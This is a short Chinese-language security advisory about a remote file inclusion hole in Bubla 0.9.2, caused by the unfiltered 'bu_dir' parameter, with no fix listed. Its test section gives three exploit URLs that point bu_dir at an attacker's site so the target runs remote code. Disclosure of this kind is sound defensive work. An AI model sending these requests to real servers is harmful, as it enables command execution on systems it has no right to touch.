Bubla远程文件包含漏洞 
系统编号:BES2007011107 
发布时间:2006-12-31 
入库时间:2007-01-05 
危害级别:★★★☆☆☆ 
影响版本:
Bubla Bubla 0.9.2 

详细说明:
Bubla是一款基于PHP的WEB应用程序。

Bubla不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。

问题是多个脚本对用户提交的'bu_dir'参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。


参考:
Davood_Cracker <Davood_cracker@yahoo.com> 
解决方案:
目前没有解决方案提供 
测试方法:

[警 告]

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!

http://example.com/[PATH]/bu/bu_claro.php?bu_dir=attacker site
http://example.com/[PATH]/bu/bu_cache.php?bu_dir=attacker site
http://exmaple.com/[PATH]/bu/bu_parse.php?bu_dir=attacker site